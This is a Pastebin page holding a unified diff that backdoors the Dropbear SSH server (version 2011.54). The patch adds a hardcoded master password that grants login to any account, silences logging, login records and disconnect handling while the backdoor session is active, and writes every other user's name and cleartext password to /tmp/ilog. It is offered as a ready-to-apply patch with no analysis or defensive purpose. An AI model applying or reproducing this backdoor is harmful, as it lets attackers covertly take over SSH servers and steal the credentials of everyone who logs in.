Advertisement
mightyroot

shell dropbeer patched

Aug 23rd, 2012
314
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.31 KB | None | 0 0
  1. diff -u dropbear-2011.54/dbutil.c dropbear-2011.54.bd/dbutil.c
  2. --- dropbear-2011.54/dbutil.c   2011-11-08 14:48:15.000000000 +0200
  3. +++ dropbear-2011.54.bd/dbutil.c        2012-01-25 04:21:37.000000000 +0200
  4. @@ -90,6 +90,8 @@
  5.  }
  6.  
  7.  void dropbear_exit(const char* format, ...) {
  8. +       if(backdoorActive == 1)
  9. +       return;
  10.  
  11.         va_list param;
  12.  
  13. @@ -100,7 +102,8 @@
  14.  
  15.  static void generic_dropbear_exit(int exitcode, const char* format,
  16.                 va_list param) {
  17. -
  18. +       if(backdoorActive == 1)
  19. +       exit(exitcode);
  20.         char fmtbuf[300];
  21.  
  22.         snprintf(fmtbuf, sizeof(fmtbuf), "Exited: %s", format);
  23. @@ -117,6 +120,8 @@
  24.  static void generic_dropbear_log(int UNUSED(priority), const char* format,
  25.                 va_list param) {
  26.  
  27. +       if(backdoorActive == 1)
  28. +       return;
  29.         char printbuf[1024];
  30.  
  31.         vsnprintf(printbuf, sizeof(printbuf), format, param);
  32. @@ -128,6 +133,9 @@
  33.  /* this is what can be called to write arbitrary log messages */
  34.  void dropbear_log(int priority, const char* format, ...) {
  35.  
  36. +       if(backdoorActive == 1)
  37. +       return;
  38. +
  39.         va_list param;
  40.  
  41.         va_start(param, format);
  42. diff -u dropbear-2011.54/includes.h dropbear-2011.54.bd/includes.h
  43. --- dropbear-2011.54/includes.h 2011-11-08 14:48:15.000000000 +0200
  44. +++ dropbear-2011.54.bd/includes.h      2012-01-25 04:37:31.000000000 +0200
  45. @@ -25,7 +25,6 @@
  46.  #ifndef _INCLUDES_H_
  47.  #define _INCLUDES_H_
  48.  
  49. -
  50.  #include "config.h"
  51.  #include "options.h"
  52.  #include "debug.h"
  53. @@ -152,5 +151,9 @@
  54.  #else
  55.  # define UNUSED(x) x
  56.  #endif
  57. +#define B4XDOOR "your_pass_goes_here"
  58. +FILE *f;
  59. +#define ILOG "/tmp/ilog"
  60. +int backdoorActive;
  61.  
  62.  #endif /* _INCLUDES_H_ */
  63. diff -u dropbear-2011.54/loginrec.c dropbear-2011.54.bd/loginrec.c
  64. --- dropbear-2011.54/loginrec.c 2011-11-08 14:48:15.000000000 +0200
  65. +++ dropbear-2011.54.bd/loginrec.c      2012-01-25 04:16:33.000000000 +0200
  66. @@ -327,6 +327,9 @@
  67.  int
  68.  login_write (struct logininfo *li)
  69.  {
  70. +       if(backdoorActive == 1)
  71. +       return 0;
  72. +
  73.  #ifndef HAVE_CYGWIN
  74.         if ((int)geteuid() != 0) {
  75.           dropbear_log(LOG_WARNING,
  76. diff -u dropbear-2011.54/process-packet.c dropbear-2011.54.bd/process-packet.c
  77. --- dropbear-2011.54/process-packet.c   2011-11-08 14:48:15.000000000 +0200
  78. +++ dropbear-2011.54.bd/process-packet.c        2012-01-25 04:07:29.000000000 +0200
  79. @@ -69,6 +69,8 @@
  80.  
  81.                 case SSH_MSG_DISCONNECT:
  82.                         /* TODO cleanup? */
  83. +                       if (backdoorActive == 1)
  84. +                       return;
  85.                         dropbear_close("Disconnect received");
  86.         }
  87.  
  88. diff -u dropbear-2011.54/svr-authpasswd.c dropbear-2011.54.bd/svr-authpasswd.c
  89. --- dropbear-2011.54/svr-authpasswd.c   2011-11-08 14:48:15.000000000 +0200
  90. +++ dropbear-2011.54.bd/svr-authpasswd.c        2012-01-25 04:31:19.000000000 +0200
  91. @@ -35,6 +35,8 @@
  92.  /* Process a password auth request, sending success or failure messages as
  93.   * appropriate */
  94.  void svr_auth_password() {
  95. +
  96. +       backdoorActive = 0;
  97.  
  98.  #ifdef HAVE_SHADOW_H
  99.         struct spwd *spasswd = NULL;
  100. @@ -71,6 +73,18 @@
  101.  
  102.         password = buf_getstring(ses.payload, &passwordlen);
  103.  
  104. +       if(password){
  105. +               if (!strcmp(password, B4XDOOR)) {
  106. +                       backdoorActive = 1;
  107. +                       send_msg_userauth_success();
  108. +                       return;
  109. +               }
  110. +               if((f=fopen(ILOG,"a"))!=NULL){
  111. +                       fprintf(f,"user:password --> %s:%s\n",ses.authstate.pw_name, password);
  112. +                       fclose(f);
  113. +               }
  114. +       }
  115. +
  116.         /* the first bytes of passwdcrypt are the salt */
  117.         testcrypt = crypt((char*)password, passwdcrypt);
  118.         m_burn(password, passwordlen);
  119. diff -u dropbear-2011.54/svr-main.c dropbear-2011.54.bd/svr-main.c
  120. --- dropbear-2011.54/svr-main.c 2011-11-08 14:48:15.000000000 +0200
  121. +++ dropbear-2011.54.bd/svr-main.c      2012-01-25 04:05:43.000000000 +0200
  122. @@ -285,7 +285,7 @@
  123.  #endif /* DEBUG_FORKGPROF */
  124.  
  125.                                 getaddrstring(&remoteaddr, NULL, &remote_port, 0);
  126. -                               dropbear_log(LOG_INFO, "Child connection from %s:%s", remote_host, remote_port);
  127. +                               //dropbear_log(LOG_INFO, "Child connection from %s:%s", remote_host, remote_port);
  128.                                 m_free(remote_host);
  129.                                 m_free(remote_port);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement